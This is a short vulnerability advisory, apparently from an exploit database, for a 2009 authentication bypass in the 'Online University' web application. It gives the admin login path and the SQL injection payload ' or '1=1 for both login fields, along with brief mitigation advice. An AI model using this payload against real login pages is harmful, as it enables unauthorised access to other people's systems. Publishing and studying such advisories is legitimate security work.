Online University (Auth Bypass) SQL Injection Vulnerability

vendor:

Online University

by:

cr4wl3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online University

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Online University (Auth Bypass) SQL Injection Vulnerability

A vulnerability exists in the Online University web application which allows an attacker to bypass authentication by providing a crafted Login ID and Password. This vulnerability works only when the magic_quotes_gpc is set to off. The PoC for this vulnerability is to provide the Login ID as ' or '1=1 and the Password as ' or '1=1.

Mitigation:

Ensure that the magic_quotes_gpc is set to on. Additionally, input validation should be performed on all user-supplied data.

Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-----------------------------
   | Online University (Auth Bypass) SQL Injection Vulnerability  |
   |           (works only with magic_quotes_gpc = off)           |
   ----------------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Homepage: http://h4ckb0x.org/
[!] Script: http://hostnomi.net/detail.php?spid=30
[!] Dork: no dork for script kiddies :p~
[!] Remote: yes

[x] PoC:

http://[site]/uniweb/siteadmin/login.asp

Login ID : ' or '1=1
Password : ' or '1=1

[~] Greetz: r0073r, str0ke, opt!x hacker, xoron, Ricardo Almeida, cyberlog, irvian, zreg, k1n9k0ng, letjen, team_elite, wiro sableng, samuel MC, EA ngel, and all my friend
[~] Special to: Valentin Hobel (Happy Birthday brotha) ;)

[~] Visit: inj3ct0r.com, exploit-db.com for more exploits and to update the new exploits
[~] Regards: cr4wl3r